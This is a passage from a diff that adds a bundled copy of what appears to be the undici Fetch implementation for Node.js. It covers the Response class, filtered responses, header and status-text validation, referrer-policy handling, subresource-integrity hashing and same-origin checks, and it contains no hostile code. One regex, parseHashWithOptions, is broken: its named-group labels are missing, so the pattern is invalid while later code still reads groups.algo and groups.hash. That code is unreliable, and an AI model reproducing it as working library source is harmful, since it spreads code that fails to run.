URLSerializer } = __nccwpck_require__(685) +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { types } = __nccwpck_require__(3837) + +const ReadableStream = globalThis.ReadableStream || (__nccwpck_require__(5356).ReadableStream) +const textEncoder = new TextEncoder('utf-8') + +// https://fetch.spec.whatwg.org/#response-class +class Response { + // Creates network error Response. + static error () { + // TODO + const relevantRealm = { settingsObject: {} } + + // The static error() method steps are to return the result of creating a + // Response object, given a new network error, "immutable", and this’s + // relevant Realm. + const responseObject = new Response() + responseObject[kState] = makeNetworkError() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kHeadersList] = responseObject[kState].headersList + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + return responseObject + } + + // https://fetch.spec.whatwg.org/#dom-response-json + static json (data, init = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'Response.json' }) + + if (init !== null) { + init = webidl.converters.ResponseInit(init) + } + + // 1. Let bytes the result of running serialize a JavaScript value to JSON bytes on data. + const bytes = textEncoder.encode( + serializeJavascriptValueToJSONString(data) + ) + + // 2. Let body be the result of extracting bytes. + const body = extractBody(bytes) + + // 3. Let responseObject be the result of creating a Response object, given a new response, + // "response", and this’s relevant Realm. + const relevantRealm = { settingsObject: {} } + const responseObject = new Response() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kGuard] = 'response' + responseObject[kHeaders][kRealm] = relevantRealm + + // 4. Perform initialize a response given responseObject, init, and (body, "application/json"). + initializeResponse(responseObject, init, { body: body[0], type: 'application/json' }) + + // 5. Return responseObject. + return responseObject + } + + // Creates a redirect Response that redirects to url with status status. + static redirect (url, status = 302) { + const relevantRealm = { settingsObject: {} } + + webidl.argumentLengthCheck(arguments, 1, { header: 'Response.redirect' }) + + url = webidl.converters.USVString(url) + status = webidl.converters['unsigned short'](status) + + // 1. Let parsedURL be the result of parsing url with current settings + // object’s API base URL. + // 2. If parsedURL is failure, then throw a TypeError. + // TODO: base-URL? + let parsedURL + try { + parsedURL = new URL(url, getGlobalOrigin()) + } catch (err) { + throw Object.assign(new TypeError('Failed to parse URL from ' + url), { + cause: err + }) + } + + // 3. If status is not a redirect status, then throw a RangeError. + if (!redirectStatusSet.has(status)) { + throw new RangeError('Invalid status code ' + status) + } + + // 4. Let responseObject be the result of creating a Response object, + // given a new response, "immutable", and this’s relevant Realm. + const responseObject = new Response() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + + // 5. Set responseObject’s response’s status to status. + responseObject[kState].status = status + + // 6. Let value be parsedURL, serialized and isomorphic encoded. + const value = isomorphicEncode(URLSerializer(parsedURL)) + + // 7. Append `Location`/value to responseObject’s response’s header list. + responseObject[kState].headersList.append('location', value) + + // 8. Return responseObject. + return responseObject + } + + // https://fetch.spec.whatwg.org/#dom-response + constructor (body = null, init = {}) { + if (body !== null) { + body = webidl.converters.BodyInit(body) + } + + init = webidl.converters.ResponseInit(init) + + // TODO + this[kRealm] = { settingsObject: {} } + + // 1. Set this’s response to a new response. + this[kState] = makeResponse({}) + + // 2. Set this’s headers to a new Headers object with this’s relevant + // Realm, whose header list is this’s response’s header list and guard + // is "response". + this[kHeaders] = new Headers(kConstruct) + this[kHeaders][kGuard] = 'response' + this[kHeaders][kHeadersList] = this[kState].headersList + this[kHeaders][kRealm] = this[kRealm] + + // 3. Let bodyWithType be null. + let bodyWithType = null + + // 4. If body is non-null, then set bodyWithType to the result of extracting body. + if (body != null) { + const [extractedBody, type] = extractBody(body) + bodyWithType = { body: extractedBody, type } + } + + // 5. Perform initialize a response given this, init, and bodyWithType. + initializeResponse(this, init, bodyWithType) + } + + // Returns response’s type, e.g., "cors". + get type () { + webidl.brandCheck(this, Response) + + // The type getter steps are to return this’s response’s type. + return this[kState].type + } + + // Returns response’s URL, if it has one; otherwise the empty string. + get url () { + webidl.brandCheck(this, Response) + + const urlList = this[kState].urlList + + // The url getter steps are to return the empty string if this’s + // response’s URL is null; otherwise this’s response’s URL, + // serialized with exclude fragment set to true. + const url = urlList[urlList.length - 1] ?? null + + if (url === null) { + return '' + } + + return URLSerializer(url, true) + } + + // Returns whether response was obtained through a redirect. + get redirected () { + webidl.brandCheck(this, Response) + + // The redirected getter steps are to return true if this’s response’s URL + // list has more than one item; otherwise false. + return this[kState].urlList.length > 1 + } + + // Returns response’s status. + get status () { + webidl.brandCheck(this, Response) + + // The status getter steps are to return this’s response’s status. + return this[kState].status + } + + // Returns whether response’s status is an ok status. + get ok () { + webidl.brandCheck(this, Response) + + // The ok getter steps are to return true if this’s response’s status is an + // ok status; otherwise false. + return this[kState].status >= 200 && this[kState].status <= 299 + } + + // Returns response’s status message. + get statusText () { + webidl.brandCheck(this, Response) + + // The statusText getter steps are to return this’s response’s status + // message. + return this[kState].statusText + } + + // Returns response’s headers as Headers. + get headers () { + webidl.brandCheck(this, Response) + + // The headers getter steps are to return this’s headers. + return this[kHeaders] + } + + get body () { + webidl.brandCheck(this, Response) + + return this[kState].body ? this[kState].body.stream : null + } + + get bodyUsed () { + webidl.brandCheck(this, Response) + + return !!this[kState].body && util.isDisturbed(this[kState].body.stream) + } + + // Returns a clone of response. + clone () { + webidl.brandCheck(this, Response) + + // 1. If this is unusable, then throw a TypeError. + if (this.bodyUsed || (this.body && this.body.locked)) { + throw webidl.errors.exception({ + header: 'Response.clone', + message: 'Body has already been consumed.' + }) + } + + // 2. Let clonedResponse be the result of cloning this’s response. + const clonedResponse = cloneResponse(this[kState]) + + // 3. Return the result of creating a Response object, given + // clonedResponse, this’s headers’s guard, and this’s relevant Realm. + const clonedResponseObject = new Response() + clonedResponseObject[kState] = clonedResponse + clonedResponseObject[kRealm] = this[kRealm] + clonedResponseObject[kHeaders][kHeadersList] = clonedResponse.headersList + clonedResponseObject[kHeaders][kGuard] = this[kHeaders][kGuard] + clonedResponseObject[kHeaders][kRealm] = this[kHeaders][kRealm] + + return clonedResponseObject + } +} + +mixinBody(Response) + +Object.defineProperties(Response.prototype, { + type: kEnumerableProperty, + url: kEnumerableProperty, + status: kEnumerableProperty, + ok: kEnumerableProperty, + redirected: kEnumerableProperty, + statusText: kEnumerableProperty, + headers: kEnumerableProperty, + clone: kEnumerableProperty, + body: kEnumerableProperty, + bodyUsed: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'Response', + configurable: true + } +}) + +Object.defineProperties(Response, { + json: kEnumerableProperty, + redirect: kEnumerableProperty, + error: kEnumerableProperty +}) + +// https://fetch.spec.whatwg.org/#concept-response-clone +function cloneResponse (response) { + // To clone a response response, run these steps: + + // 1. If response is a filtered response, then return a new identical + // filtered response whose internal response is a clone of response’s + // internal response. + if (response.internalResponse) { + return filterResponse( + cloneResponse(response.internalResponse), + response.type + ) + } + + // 2. Let newResponse be a copy of response, except for its body. + const newResponse = makeResponse({ ...response, body: null }) + + // 3. If response’s body is non-null, then set newResponse’s body to the + // result of cloning response’s body. + if (response.body != null) { + newResponse.body = cloneBody(response.body) + } + + // 4. Return newResponse. + return newResponse +} + +function makeResponse (init) { + return { + aborted: false, + rangeRequested: false, + timingAllowPassed: false, + requestIncludesCredentials: false, + type: 'default', + status: 200, + timingInfo: null, + cacheState: '', + statusText: '', + ...init, + headersList: init.headersList + ? new HeadersList(init.headersList) + : new HeadersList(), + urlList: init.urlList ? [...init.urlList] : [] + } +} + +function makeNetworkError (reason) { + const isError = isErrorLike(reason) + return makeResponse({ + type: 'error', + status: 0, + error: isError + ? reason + : new Error(reason ? String(reason) : reason), + aborted: reason && reason.name === 'AbortError' + }) +} + +function makeFilteredResponse (response, state) { + state = { + internalResponse: response, + ...state + } + + return new Proxy(response, { + get (target, p) { + return p in state ? state[p] : target[p] + }, + set (target, p, value) { + assert(!(p in state)) + target[p] = value + return true + } + }) +} + +// https://fetch.spec.whatwg.org/#concept-filtered-response +function filterResponse (response, type) { + // Set response to the following filtered response with response as its + // internal response, depending on request’s response tainting: + if (type === 'basic') { + // A basic filtered response is a filtered response whose type is "basic" + // and header list excludes any headers in internal response’s header list + // whose name is a forbidden response-header name. + + // Note: undici does not implement forbidden response-header names + return makeFilteredResponse(response, { + type: 'basic', + headersList: response.headersList + }) + } else if (type === 'cors') { + // A CORS filtered response is a filtered response whose type is "cors" + // and header list excludes any headers in internal response’s header + // list whose name is not a CORS-safelisted response-header name, given + // internal response’s CORS-exposed header-name list. + + // Note: undici does not implement CORS-safelisted response-header names + return makeFilteredResponse(response, { + type: 'cors', + headersList: response.headersList + }) + } else if (type === 'opaque') { + // An opaque filtered response is a filtered response whose type is + // "opaque", URL list is the empty list, status is 0, status message + // is the empty byte sequence, header list is empty, and body is null. + + return makeFilteredResponse(response, { + type: 'opaque', + urlList: Object.freeze([]), + status: 0, + statusText: '', + body: null + }) + } else if (type === 'opaqueredirect') { + // An opaque-redirect filtered response is a filtered response whose type + // is "opaqueredirect", status is 0, status message is the empty byte + // sequence, header list is empty, and body is null. + + return makeFilteredResponse(response, { + type: 'opaqueredirect', + status: 0, + statusText: '', + headersList: [], + body: null + }) + } else { + assert(false) + } +} + +// https://fetch.spec.whatwg.org/#appropriate-network-error +function makeAppropriateNetworkError (fetchParams, err = null) { + // 1. Assert: fetchParams is canceled. + assert(isCancelled(fetchParams)) + + // 2. Return an aborted network error if fetchParams is aborted; + // otherwise return a network error. + return isAborted(fetchParams) + ? makeNetworkError(Object.assign(new DOMException('The operation was aborted.', 'AbortError'), { cause: err })) + : makeNetworkError(Object.assign(new DOMException('Request was cancelled.'), { cause: err })) +} + +// https://whatpr.org/fetch/1392.html#initialize-a-response +function initializeResponse (response, init, body) { + // 1. If init["status"] is not in the range 200 to 599, inclusive, then + // throw a RangeError. + if (init.status !== null && (init.status < 200 || init.status > 599)) { + throw new RangeError('init["status"] must be in the range of 200 to 599, inclusive.') + } + + // 2. If init["statusText"] does not match the reason-phrase token production, + // then throw a TypeError. + if ('statusText' in init && init.statusText != null) { + // See, https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2: + // reason-phrase = *( HTAB / SP / VCHAR / obs-text ) + if (!isValidReasonPhrase(String(init.statusText))) { + throw new TypeError('Invalid statusText') + } + } + + // 3. Set response’s response’s status to init["status"]. + if ('status' in init && init.status != null) { + response[kState].status = init.status + } + + // 4. Set response’s response’s status message to init["statusText"]. + if ('statusText' in init && init.statusText != null) { + response[kState].statusText = init.statusText + } + + // 5. If init["headers"] exists, then fill response’s headers with init["headers"]. + if ('headers' in init && init.headers != null) { + fill(response[kHeaders], init.headers) + } + + // 6. If body was given, then: + if (body) { + // 1. If response's status is a null body status, then throw a TypeError. + if (nullBodyStatus.includes(response.status)) { + throw webidl.errors.exception({ + header: 'Response constructor', + message: 'Invalid response status code ' + response.status + }) + } + + // 2. Set response's body to body's body. + response[kState].body = body.body + + // 3. If body's type is non-null and response's header list does not contain + // `Content-Type`, then append (`Content-Type`, body's type) to response's header list. + if (body.type != null && !response[kState].headersList.contains('Content-Type')) { + response[kState].headersList.append('content-type', body.type) + } + } +} + +webidl.converters.ReadableStream = webidl.interfaceConverter( + ReadableStream +) + +webidl.converters.FormData = webidl.interfaceConverter( + FormData +) + +webidl.converters.URLSearchParams = webidl.interfaceConverter( + URLSearchParams +) + +// https://fetch.spec.whatwg.org/#typedefdef-xmlhttprequestbodyinit +webidl.converters.XMLHttpRequestBodyInit = function (V) { + if (typeof V === 'string') { + return webidl.converters.USVString(V) + } + + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if (types.isArrayBuffer(V) || types.isTypedArray(V) || types.isDataView(V)) { + return webidl.converters.BufferSource(V) + } + + if (util.isFormDataLike(V)) { + return webidl.converters.FormData(V, { strict: false }) + } + + if (V instanceof URLSearchParams) { + return webidl.converters.URLSearchParams(V) + } + + return webidl.converters.DOMString(V) +} + +// https://fetch.spec.whatwg.org/#bodyinit +webidl.converters.BodyInit = function (V) { + if (V instanceof ReadableStream) { + return webidl.converters.ReadableStream(V) + } + + // Note: the spec doesn't include async iterables, + // this is an undici extension. + if (V?.[Symbol.asyncIterator]) { + return V + } + + return webidl.converters.XMLHttpRequestBodyInit(V) +} + +webidl.converters.ResponseInit = webidl.dictionaryConverter([ + { + key: 'status', + converter: webidl.converters['unsigned short'], + defaultValue: 200 + }, + { + key: 'statusText', + converter: webidl.converters.ByteString, + defaultValue: '' + }, + { + key: 'headers', + converter: webidl.converters.HeadersInit + } +]) + +module.exports = { + makeNetworkError, + makeResponse, + makeAppropriateNetworkError, + filterResponse, + Response, + cloneResponse +} + + +/***/ }), + +/***/ 5861: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kUrl: Symbol('url'), + kHeaders: Symbol('headers'), + kSignal: Symbol('signal'), + kState: Symbol('state'), + kGuard: Symbol('guard'), + kRealm: Symbol('realm') +} + + +/***/ }), + +/***/ 2538: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { redirectStatusSet, referrerPolicySet: referrerPolicyTokens, badPortsSet } = __nccwpck_require__(1037) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { performance } = __nccwpck_require__(4074) +const { isBlobLike, toUSVString, ReadableStreamFrom } = __nccwpck_require__(3983) +const assert = __nccwpck_require__(9491) +const { isUint8Array } = __nccwpck_require__(9830) + +// https://nodejs.org/api/crypto.html#determining-if-crypto-support-is-unavailable +/** @type {import('crypto')|undefined} */ +let crypto + +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +function responseURL (response) { + // https://fetch.spec.whatwg.org/#responses + // A response has an associated URL. It is a pointer to the last URL + // in response’s URL list and null if response’s URL list is empty. + const urlList = response.urlList + const length = urlList.length + return length === 0 ? null : urlList[length - 1].toString() +} + +// https://fetch.spec.whatwg.org/#concept-response-location-url +function responseLocationURL (response, requestFragment) { + // 1. If response’s status is not a redirect status, then return null. + if (!redirectStatusSet.has(response.status)) { + return null + } + + // 2. Let location be the result of extracting header list values given + // `Location` and response’s header list. + let location = response.headersList.get('location') + + // 3. If location is a header value, then set location to the result of + // parsing location with response’s URL. + if (location !== null && isValidHeaderValue(location)) { + location = new URL(location, responseURL(response)) + } + + // 4. If location is a URL whose fragment is null, then set location’s + // fragment to requestFragment. + if (location && !location.hash) { + location.hash = requestFragment + } + + // 5. Return location. + return location +} + +/** @returns {URL} */ +function requestCurrentURL (request) { + return request.urlList[request.urlList.length - 1] +} + +function requestBadPort (request) { + // 1. Let url be request’s current URL. + const url = requestCurrentURL(request) + + // 2. If url’s scheme is an HTTP(S) scheme and url’s port is a bad port, + // then return blocked. + if (urlIsHttpHttpsScheme(url) && badPortsSet.has(url.port)) { + return 'blocked' + } + + // 3. Return allowed. + return 'allowed' +} + +function isErrorLike (object) { + return object instanceof Error || ( + object?.constructor?.name === 'Error' || + object?.constructor?.name === 'DOMException' + ) +} + +// Check whether |statusText| is a ByteString and +// matches the Reason-Phrase token production. +// RFC 2616: https://tools.ietf.org/html/rfc2616 +// RFC 7230: https://tools.ietf.org/html/rfc7230 +// "reason-phrase = *( HTAB / SP / VCHAR / obs-text )" +// https://github.com/chromium/chromium/blob/94.0.4604.1/third_party/blink/renderer/core/fetch/response.cc#L116 +function isValidReasonPhrase (statusText) { + for (let i = 0; i < statusText.length; ++i) { + const c = statusText.charCodeAt(i) + if ( + !( + ( + c === 0x09 || // HTAB + (c >= 0x20 && c <= 0x7e) || // SP / VCHAR + (c >= 0x80 && c <= 0xff) + ) // obs-text + ) + ) { + return false + } + } + return true +} + +/** + * @see https://tools.ietf.org/html/rfc7230#section-3.2.6 + * @param {number} c + */ +function isTokenCharCode (c) { + switch (c) { + case 0x22: + case 0x28: + case 0x29: + case 0x2c: + case 0x2f: + case 0x3a: + case 0x3b: + case 0x3c: + case 0x3d: + case 0x3e: + case 0x3f: + case 0x40: + case 0x5b: + case 0x5c: + case 0x5d: + case 0x7b: + case 0x7d: + // DQUOTE and "(),/:;<=>?@[\]{}" + return false + default: + // VCHAR %x21-7E + return c >= 0x21 && c <= 0x7e + } +} + +/** + * @param {string} characters + */ +function isValidHTTPToken (characters) { + if (characters.length === 0) { + return false + } + for (let i = 0; i < characters.length; ++i) { + if (!isTokenCharCode(characters.charCodeAt(i))) { + return false + } + } + return true +} + +/** + * @see https://fetch.spec.whatwg.org/#header-name + * @param {string} potentialValue + */ +function isValidHeaderName (potentialValue) { + return isValidHTTPToken(potentialValue) +} + +/** + * @see https://fetch.spec.whatwg.org/#header-value + * @param {string} potentialValue + */ +function isValidHeaderValue (potentialValue) { + // - Has no leading or trailing HTTP tab or space bytes. + // - Contains no 0x00 (NUL) or HTTP newline bytes. + if ( + potentialValue.startsWith('\t') || + potentialValue.startsWith(' ') || + potentialValue.endsWith('\t') || + potentialValue.endsWith(' ') + ) { + return false + } + + if ( + potentialValue.includes('\0') || + potentialValue.includes('\r') || + potentialValue.includes('\n') + ) { + return false + } + + return true +} + +// https://w3c.github.io/webappsec-referrer-policy/#set-requests-referrer-policy-on-redirect +function setRequestReferrerPolicyOnRedirect (request, actualResponse) { + // Given a request request and a response actualResponse, this algorithm + // updates request’s referrer policy according to the Referrer-Policy + // header (if any) in actualResponse. + + // 1. Let policy be the result of executing § 8.1 Parse a referrer policy + // from a Referrer-Policy header on actualResponse. + + // 8.1 Parse a referrer policy from a Referrer-Policy header + // 1. Let policy-tokens be the result of extracting header list values given `Referrer-Policy` and response’s header list. + const { headersList } = actualResponse + // 2. Let policy be the empty string. + // 3. For each token in policy-tokens, if token is a referrer policy and token is not the empty string, then set policy to token. + // 4. Return policy. + const policyHeader = (headersList.get('referrer-policy') ?? '').split(',') + + // Note: As the referrer-policy can contain multiple policies + // separated by comma, we need to loop through all of them + // and pick the first valid one. + // Ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#specify_a_fallback_policy + let policy = '' + if (policyHeader.length > 0) { + // The right-most policy takes precedence. + // The left-most policy is the fallback. + for (let i = policyHeader.length; i !== 0; i--) { + const token = policyHeader[i - 1].trim() + if (referrerPolicyTokens.has(token)) { + policy = token + break + } + } + } + + // 2. If policy is not the empty string, then set request’s referrer policy to policy. + if (policy !== '') { + request.referrerPolicy = policy + } +} + +// https://fetch.spec.whatwg.org/#cross-origin-resource-policy-check +function crossOriginResourcePolicyCheck () { + // TODO + return 'allowed' +} + +// https://fetch.spec.whatwg.org/#concept-cors-check +function corsCheck () { + // TODO + return 'success' +} + +// https://fetch.spec.whatwg.org/#concept-tao-check +function TAOCheck () { + // TODO + return 'success' +} + +function appendFetchMetadata (httpRequest) { + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-dest-header + // TODO + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-mode-header + + // 1. Assert: r’s url is a potentially trustworthy URL. + // TODO + + // 2. Let header be a Structured Header whose value is a token. + let header = null + + // 3. Set header’s value to r’s mode. + header = httpRequest.mode + + // 4. Set a structured field value `Sec-Fetch-Mode`/header in r’s header list. + httpRequest.headersList.set('sec-fetch-mode', header) + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header + // TODO + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-user-header + // TODO +} + +// https://fetch.spec.whatwg.org/#append-a-request-origin-header +function appendRequestOriginHeader (request) { + // 1. Let serializedOrigin be the result of byte-serializing a request origin with request. + let serializedOrigin = request.origin + + // 2. If request’s response tainting is "cors" or request’s mode is "websocket", then append (`Origin`, serializedOrigin) to request’s header list. + if (request.responseTainting === 'cors' || request.mode === 'websocket') { + if (serializedOrigin) { + request.headersList.append('origin', serializedOrigin) + } + + // 3. Otherwise, if request’s method is neither `GET` nor `HEAD`, then: + } else if (request.method !== 'GET' && request.method !== 'HEAD') { + // 1. Switch on request’s referrer policy: + switch (request.referrerPolicy) { + case 'no-referrer': + // Set serializedOrigin to `null`. + serializedOrigin = null + break + case 'no-referrer-when-downgrade': + case 'strict-origin': + case 'strict-origin-when-cross-origin': + // If request’s origin is a tuple origin, its scheme is "https", and request’s current URL’s scheme is not "https", then set serializedOrigin to `null`. + if (request.origin && urlHasHttpsScheme(request.origin) && !urlHasHttpsScheme(requestCurrentURL(request))) { + serializedOrigin = null + } + break + case 'same-origin': + // If request’s origin is not same origin with request’s current URL’s origin, then set serializedOrigin to `null`. + if (!sameOrigin(request, requestCurrentURL(request))) { + serializedOrigin = null + } + break + default: + // Do nothing. + } + + if (serializedOrigin) { + // 2. Append (`Origin`, serializedOrigin) to request’s header list. + request.headersList.append('origin', serializedOrigin) + } + } +} + +function coarsenedSharedCurrentTime (crossOriginIsolatedCapability) { + // TODO + return performance.now() +} + +// https://fetch.spec.whatwg.org/#create-an-opaque-timing-info +function createOpaqueTimingInfo (timingInfo) { + return { + startTime: timingInfo.startTime ?? 0, + redirectStartTime: 0, + redirectEndTime: 0, + postRedirectStartTime: timingInfo.startTime ?? 0, + finalServiceWorkerStartTime: 0, + finalNetworkResponseStartTime: 0, + finalNetworkRequestStartTime: 0, + endTime: 0, + encodedBodySize: 0, + decodedBodySize: 0, + finalConnectionTimingInfo: null + } +} + +// https://html.spec.whatwg.org/multipage/origin.html#policy-container +function makePolicyContainer () { + // Note: the fetch spec doesn't make use of embedder policy or CSP list + return { + referrerPolicy: 'strict-origin-when-cross-origin' + } +} + +// https://html.spec.whatwg.org/multipage/origin.html#clone-a-policy-container +function clonePolicyContainer (policyContainer) { + return { + referrerPolicy: policyContainer.referrerPolicy + } +} + +// https://w3c.github.io/webappsec-referrer-policy/#determine-requests-referrer +function determineRequestsReferrer (request) { + // 1. Let policy be request's referrer policy. + const policy = request.referrerPolicy + + // Note: policy cannot (shouldn't) be null or an empty string. + assert(policy) + + // 2. Let environment be request’s client. + + let referrerSource = null + + // 3. Switch on request’s referrer: + if (request.referrer === 'client') { + // Note: node isn't a browser and doesn't implement document/iframes, + // so we bypass this step and replace it with our own. + + const globalOrigin = getGlobalOrigin() + + if (!globalOrigin || globalOrigin.origin === 'null') { + return 'no-referrer' + } + + // note: we need to clone it as it's mutated + referrerSource = new URL(globalOrigin) + } else if (request.referrer instanceof URL) { + // Let referrerSource be request’s referrer. + referrerSource = request.referrer + } + + // 4. Let request’s referrerURL be the result of stripping referrerSource for + // use as a referrer. + let referrerURL = stripURLForReferrer(referrerSource) + + // 5. Let referrerOrigin be the result of stripping referrerSource for use as + // a referrer, with the origin-only flag set to true. + const referrerOrigin = stripURLForReferrer(referrerSource, true) + + // 6. If the result of serializing referrerURL is a string whose length is + // greater than 4096, set referrerURL to referrerOrigin. + if (referrerURL.toString().length > 4096) { + referrerURL = referrerOrigin + } + + const areSameOrigin = sameOrigin(request, referrerURL) + const isNonPotentiallyTrustWorthy = isURLPotentiallyTrustworthy(referrerURL) && + !isURLPotentiallyTrustworthy(request.url) + + // 8. Execute the switch statements corresponding to the value of policy: + switch (policy) { + case 'origin': return referrerOrigin != null ? referrerOrigin : stripURLForReferrer(referrerSource, true) + case 'unsafe-url': return referrerURL + case 'same-origin': + return areSameOrigin ? referrerOrigin : 'no-referrer' + case 'origin-when-cross-origin': + return areSameOrigin ? referrerURL : referrerOrigin + case 'strict-origin-when-cross-origin': { + const currentURL = requestCurrentURL(request) + + // 1. If the origin of referrerURL and the origin of request’s current + // URL are the same, then return referrerURL. + if (sameOrigin(referrerURL, currentURL)) { + return referrerURL + } + + // 2. If referrerURL is a potentially trustworthy URL and request’s + // current URL is not a potentially trustworthy URL, then return no + // referrer. + if (isURLPotentiallyTrustworthy(referrerURL) && !isURLPotentiallyTrustworthy(currentURL)) { + return 'no-referrer' + } + + // 3. Return referrerOrigin. + return referrerOrigin + } + case 'strict-origin': // eslint-disable-line + /** + * 1. If referrerURL is a potentially trustworthy URL and + * request’s current URL is not a potentially trustworthy URL, + * then return no referrer. + * 2. Return referrerOrigin + */ + case 'no-referrer-when-downgrade': // eslint-disable-line + /** + * 1. If referrerURL is a potentially trustworthy URL and + * request’s current URL is not a potentially trustworthy URL, + * then return no referrer. + * 2. Return referrerOrigin + */ + + default: // eslint-disable-line + return isNonPotentiallyTrustWorthy ? 'no-referrer' : referrerOrigin + } +} + +/** + * @see https://w3c.github.io/webappsec-referrer-policy/#strip-url + * @param {URL} url + * @param {boolean|undefined} originOnly + */ +function stripURLForReferrer (url, originOnly) { + // 1. Assert: url is a URL. + assert(url instanceof URL) + + // 2. If url’s scheme is a local scheme, then return no referrer. + if (url.protocol === 'file:' || url.protocol === 'about:' || url.protocol === 'blank:') { + return 'no-referrer' + } + + // 3. Set url’s username to the empty string. + url.username = '' + + // 4. Set url’s password to the empty string. + url.password = '' + + // 5. Set url’s fragment to null. + url.hash = '' + + // 6. If the origin-only flag is true, then: + if (originOnly) { + // 1. Set url’s path to « the empty string ». + url.pathname = '' + + // 2. Set url’s query to null. + url.search = '' + } + + // 7. Return url. + return url +} + +function isURLPotentiallyTrustworthy (url) { + if (!(url instanceof URL)) { + return false + } + + // If child of about, return true + if (url.href === 'about:blank' || url.href === 'about:srcdoc') { + return true + } + + // If scheme is data, return true + if (url.protocol === 'data:') return true + + // If file, return true + if (url.protocol === 'file:') return true + + return isOriginPotentiallyTrustworthy(url.origin) + + function isOriginPotentiallyTrustworthy (origin) { + // If origin is explicitly null, return false + if (origin == null || origin === 'null') return false + + const originAsURL = new URL(origin) + + // If secure, return true + if (originAsURL.protocol === 'https:' || originAsURL.protocol === 'wss:') { + return true + } + + // If localhost or variants, return true + if (/^127(?:\.[0-9]+){0,2}\.[0-9]+$|^\[(?:0*:)*?:?0*1\]$/.test(originAsURL.hostname) || + (originAsURL.hostname === 'localhost' || originAsURL.hostname.includes('localhost.')) || + (originAsURL.hostname.endsWith('.localhost'))) { + return true + } + + // If any other, return false + return false + } +} + +/** + * @see https://w3c.github.io/webappsec-subresource-integrity/#does-response-match-metadatalist + * @param {Uint8Array} bytes + * @param {string} metadataList + */ +function bytesMatch (bytes, metadataList) { + // If node is not built with OpenSSL support, we cannot check + // a request's integrity, so allow it by default (the spec will + // allow requests if an invalid hash is given, as precedence). + /* istanbul ignore if: only if node is built with --without-ssl */ + if (crypto === undefined) { + return true + } + + // 1. Let parsedMetadata be the result of parsing metadataList. + const parsedMetadata = parseMetadata(metadataList) + + // 2. If parsedMetadata is no metadata, return true. + if (parsedMetadata === 'no metadata') { + return true + } + + // 3. If parsedMetadata is the empty set, return true. + if (parsedMetadata.length === 0) { + return true + } + + // 4. Let metadata be the result of getting the strongest + // metadata from parsedMetadata. + const list = parsedMetadata.sort((c, d) => d.algo.localeCompare(c.algo)) + // get the strongest algorithm + const strongest = list[0].algo + // get all entries that use the strongest algorithm; ignore weaker + const metadata = list.filter((item) => item.algo === strongest) + + // 5. For each item in metadata: + for (const item of metadata) { + // 1. Let algorithm be the alg component of item. + const algorithm = item.algo + + // 2. Let expectedValue be the val component of item. + let expectedValue = item.hash + + // See https://github.com/web-platform-tests/wpt/commit/e4c5cc7a5e48093220528dfdd1c4012dc3837a0e + // "be liberal with padding". This is annoying, and it's not even in the spec. + + if (expectedValue.endsWith('==')) { + expectedValue = expectedValue.slice(0, -2) + } + + // 3. Let actualValue be the result of applying algorithm to bytes. + let actualValue = crypto.createHash(algorithm).update(bytes).digest('base64') + + if (actualValue.endsWith('==')) { + actualValue = actualValue.slice(0, -2) + } + + // 4. If actualValue is a case-sensitive match for expectedValue, + // return true. + if (actualValue === expectedValue) { + return true + } + + let actualBase64URL = crypto.createHash(algorithm).update(bytes).digest('base64url') + + if (actualBase64URL.endsWith('==')) { + actualBase64URL = actualBase64URL.slice(0, -2) + } + + if (actualBase64URL === expectedValue) { + return true + } + } + + // 6. Return false. + return false +} + +// https://w3c.github.io/webappsec-subresource-integrity/#grammardef-hash-with-options +// https://www.w3.org/TR/CSP2/#source-list-syntax +// https://www.rfc-editor.org/rfc/rfc5234#appendix-B.1 +const parseHashWithOptions = /((?sha256|sha384|sha512)-(?[A-z0-9+/]{1}.*={0,2}))( +[\x21-\x7e]?)?/i + +/** + * @see https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata + * @param {string} metadata + */ +function parseMetadata (metadata) { + // 1. Let result be the empty set. + /** @type {{ algo: string, hash: string }[]} */ + const result = [] + + // 2. Let empty be equal to true. + let empty = true + + const supportedHashes = crypto.getHashes() + + // 3. For each token returned by splitting metadata on spaces: + for (const token of metadata.split(' ')) { + // 1. Set empty to false. + empty = false + + // 2. Parse token as a hash-with-options. + const parsedToken = parseHashWithOptions.exec(token) + + // 3. If token does not parse, continue to the next token. + if (parsedToken === null || parsedToken.groups === undefined) { + // Note: Chromium blocks the request at this point, but Firefox + // gives a warning that an invalid integrity was given. The + // correct behavior is to ignore these, and subsequently not + // check the integrity of the resource. + continue + } + + // 4. Let algorithm be the hash-algo component of token. + const algorithm = parsedToken.groups.algo + + // 5. If algorithm is a hash function recognized by the user + // agent, add the parsed token to result. + if (supportedHashes.includes(algorithm.toLowerCase())) { + result.push(parsedToken.groups) + } + } + + // 4. Return no metadata if empty is true, otherwise return result. + if (empty === true) { + return 'no metadata' + } + + return result +} + +// https://w3c.github.io/webappsec-upgrade-insecure-requests/#upgrade-request +function tryUpgradeRequestToAPotentiallyTrustworthyURL (request) { + // TODO +} + +/** + * @link {https://html.spec.whatwg.org/multipage/origin.html#same-origin} + * @param {URL} A + * @param {URL} B + */ +function sameOrigin (A, B) { + // 1. If A and B are the same opaque origin, then return true. + if (A.origin === B.origin && A.origin === 'null') { + return true + } + + // 2. If A and B are both tuple origins and their schemes, + // hosts, and port are identical, then return true. + if (A.protocol === B.protocol && A.hostname === B.hostname && A.port === B.port) { + return true + } + + // 3. Return false. + return false +} + +function createDeferredPromise () { + let res + let 